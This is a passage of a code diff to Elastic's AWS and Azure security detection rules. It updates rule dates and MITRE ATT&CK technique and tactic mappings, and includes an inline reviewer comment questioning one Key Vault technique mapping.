@@ -95,34 +95,62 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml index 49cbe18daaf..8a9c66dfc46 100644 --- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml 
+++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -161,39 +161,67 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml index 6e489d34aec..da6188b1d81 100644 --- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml 
+++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,41 +134,62 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"] 
diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml index aa6c1fdbe9e..9fe428e0fc0 100644 --- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml +++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["azure"] maturity = "production" -updated_date = "2026/02/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,17 +119,17 @@ event.dataset:azure.signinlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" 
@@ -137,17 +137,44 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"] diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml index 3f48cab4cf9..7ec1a3dc5ad 100644 --- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml +++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/06" integration = ["azure"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,17 +101,39 @@ event.dataset:azure.graphactivitylogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml index a94c27b574e..319b38ece98 100644 --- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml +++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["azure"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -110,30 +110,41 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml b/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml index 563375a5e1b..feb44f03e01 100644 --- a/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml +++ b/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,39 +100,44 @@ sequence with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml index b1e86ae2c14..2f571c6638a 100644 --- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml +++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -135,30 +135,59 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml index b1b7021a706..45e975c3b2b 100644 --- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml +++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/07/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -175,19 +175,31 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml b/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml index e23245673c1..c09f67d0a5a 100644 --- a/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml +++ b/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/12" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] 
@@ -83,14 +83,26 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml index 8a88cceeb2f..2992628f85d 100644 --- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml +++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["azure"] maturity = "production" -updated_date = "2025/09/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,34 +84,54 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml index d9817465e01..a7edb7fe4fa 100644 --- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml +++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,3 +81,15 @@ id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_event_hub_deletion.toml b/rules/integrations/azure/defense_evasion_event_hub_deletion.toml index 5b308cfc613..42fb0d38b32 100644 --- a/rules/integrations/azure/defense_evasion_event_hub_deletion.toml +++ b/rules/integrations/azure/defense_evasion_event_hub_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,19 +80,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml index 76a3d0239cb..2216b229f91 100644 
--- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -80,19 +80,23 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml index 0acbfc2f754..80d0f3312ef 100644 --- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml +++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,19 +81,23 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml index 5421c5675f8..6a7f6f9d035 100644 --- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml +++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/27" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -81,14 +81,18 @@ event.outcome: "success" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml b/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml index 2cddd4d8398..c70aad56309 100644 
--- a/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml +++ b/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,6 +80,7 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" @@ -90,3 +91,15 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml index ca5229f3624..e24a3b4a3a3 100644 --- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml +++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/02" integration = ["azure"] maturity = "production" -updated_date = "2025/10/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,22 +95,34 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml index 8388ea6ebe5..da3cbcf9a01 100644 --- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml +++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,6 +86,23 @@ id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml index e394d39c999..c2c69a968d2 100644 --- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml +++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
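Review bot: The new Defense Evasion entry in `impact_key_vault_modified_by_unusual_user.toml` maps a Key Vault modification to `T1578.005` (Modify Cloud Compute Configurations), which as I read ATT&CK covers compute-side settings such as service quotas and tenant policies; a Key Vault is a secrets store rather than compute infrastructure, so the fit looks questionable. The rule's query is outside this hunk, so I cannot tell which operations it matches, but the technique should follow from those operations (access-policy or secret changes would point at a Credential Access technique rather than `T1578`). If `T1578.005` is intentional, a sentence in the description explaining the reasoning would help the next reviewer.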
@@ -89,39 +89,57 @@ event.dataset: "azure.activitylogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = 